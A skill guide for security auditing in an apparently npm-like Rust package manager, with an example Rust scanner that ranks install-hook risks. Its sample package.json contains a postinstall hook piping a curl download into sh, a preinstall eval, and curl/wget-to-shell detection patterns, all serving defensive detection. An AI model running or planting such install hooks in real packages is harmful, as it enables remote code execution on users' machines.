SKILL: fnpm-security
When to use this skill
Use it when a task touches security: auditing, AST analysis, install scripts, transitive dependencies, or risky package blocking.
Minimum context to load
- docs/SECURITY.md
- docs/TRANSITIVE_SECURITY.md
- src/security.rs
- src/ast_security_analyzer.rs
- Tests in tests/security_tests.rs
Recommended sequence
- Identify the risk surface (scripts, dynamic code, network, filesystem).
- Validate that detection does not create obvious false positives.
- Add or update security tests.
- Run focused validation:
    cargo test --test security_tests --all-features
- Run the full baseline:
    make fmt
    make clippy
    make test
Severity criteria
- Critical: arbitrary execution, credential exfiltration, strong evasion patterns.
- High: untrusted command/shell execution, remote download and execution.
- Medium: suspicious patterns without direct exploitation evidence.
- Low: potential risks with clear mitigations.
Expected output
- Findings prioritized by severity.
- Technical evidence (file and line).
- Concrete mitigation recommendation.
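The following is an added, self-contained example of the shape a finding report should take under the sequence, severity criteria and expected output above. It is not code from fnpm's src/security.rs or src/ast_security_analyzer.rs; the rule names, the Finding struct, the mitigation strings and the sample package.json are all constructed for illustration. It scans lifecycle install hooks line by line, classifies each with the page's High/Medium/Low tiers (Critical needs evidence a line scanner cannot collect and is left to AST analysis), keeps file and line as evidence, sorts by severity, and deliberately leaves an ordinary build script unflagged as a false-positive check.

```rust
// Example only: a minimal install-script scanner producing severity-ordered
// findings with file:line evidence and a mitigation. Not fnpm's own code.

/// Ordering follows declaration order, so Low < Medium < High < Critical.
#[derive(Debug, Clone, Copy, PartialEq, Eq, PartialOrd, Ord)]
pub enum Severity {
    Low,
    Medium,
    High,
    Critical,
}

#[derive(Debug, Clone, PartialEq, Eq)]
pub struct Finding {
    pub severity: Severity,
    pub file: String,
    pub line: usize, // 1-indexed line in `file`
    pub rule: &'static str,
    pub evidence: String, // the script command as written in package.json
    pub mitigation: &'static str,
}

/// npm lifecycle hooks that run automatically during installation.
const LIFECYCLE_HOOKS: [&str; 3] = ["\"preinstall\"", "\"install\"", "\"postinstall\""];

/// Extract the JSON string value from a `"key": "value"` line, honouring
/// backslash-escaped quotes. Line-level approximation, not a JSON parser.
pub fn script_value(line: &str) -> Option<&str> {
    let colon = line.find(':')?;
    let rest = &line[colon + 1..];
    let body = &rest[rest.find('"')? + 1..];
    let mut prev = '\0';
    for (i, ch) in body.char_indices() {
        if ch == '"' && prev != '\\' {
            return Some(&body[..i]);
        }
        prev = ch;
    }
    None
}

/// Map a hook command onto the page's severity tiers (hypothetical rules).
fn classify(cmd: &str) -> (Severity, &'static str, &'static str) {
    let c = cmd.to_ascii_lowercase();
    let fetches = c.contains("curl ") || c.contains("wget ");
    let pipes_to_shell = ["| sh", "|sh", "| bash", "|bash"].iter().any(|p| c.contains(*p));
    if fetches && pipes_to_shell {
        // High: remote download and execution.
        return (Severity::High, "remote-download-and-execute",
                "Vendor the script into the package and review it; never pipe a download into a shell");
    }
    if c.contains("eval(") || c.contains("new function(") {
        // Medium: dynamic code without direct exploitation evidence.
        return (Severity::Medium, "dynamic-code",
                "Replace dynamic evaluation with static, reviewable code");
    }
    // Low: a lifecycle hook exists at all; clear mitigation available.
    (Severity::Low, "lifecycle-hook",
     "Install with --ignore-scripts unless the hook has been reviewed")
}

/// Scan package.json text and return findings sorted by severity, highest first.
pub fn scan_package_json(path: &str, text: &str) -> Vec<Finding> {
    let mut findings = Vec::new();
    for (idx, line) in text.lines().enumerate() {
        let trimmed = line.trim_start();
        if !LIFECYCLE_HOOKS.iter().any(|k| trimmed.starts_with(*k)) {
            continue; // `build`, `test` etc. are not auto-run: no finding
        }
        let cmd = match script_value(trimmed) {
            Some(v) => v,
            None => continue,
        };
        let (severity, rule, mitigation) = classify(cmd);
        findings.push(Finding {
            severity, file: path.to_string(), line: idx + 1,
            rule, evidence: cmd.to_string(), mitigation,
        });
    }
    findings.sort_by(|a, b| b.severity.cmp(&a.severity));
    findings
}

/// One report line per finding: severity, file:line, rule, evidence, mitigation.
pub fn report(findings: &[Finding]) -> String {
    findings.iter()
        .map(|f| format!("[{:?}] {}:{} {} | evidence: {} | mitigation: {}",
                         f.severity, f.file, f.line, f.rule, f.evidence, f.mitigation))
        .collect::<Vec<_>>().join("\n")
}

/// Constructed sample input; line 7 (`build`) must produce no finding.
pub const SAMPLE_PACKAGE_JSON: &str = r#"{
  "name": "example-pkg",
  "version": "1.0.0",
  "scripts": {
    "preinstall": "node -e \"eval(require('./setup'))\"",
    "postinstall": "curl https://example.invalid/setup.sh | sh",
    "build": "node scripts/build.js",
    "install": "node-gyp rebuild"
  }
}"#;

fn main() {
    println!("{}", report(&scan_package_json("package.json", SAMPLE_PACKAGE_JSON)));
}
```

Running it prints three findings in High, Medium, Low order, each with the package.json line number; the `build` script is intentionally absent, which is the "no obvious false positives" check from the recommended sequence.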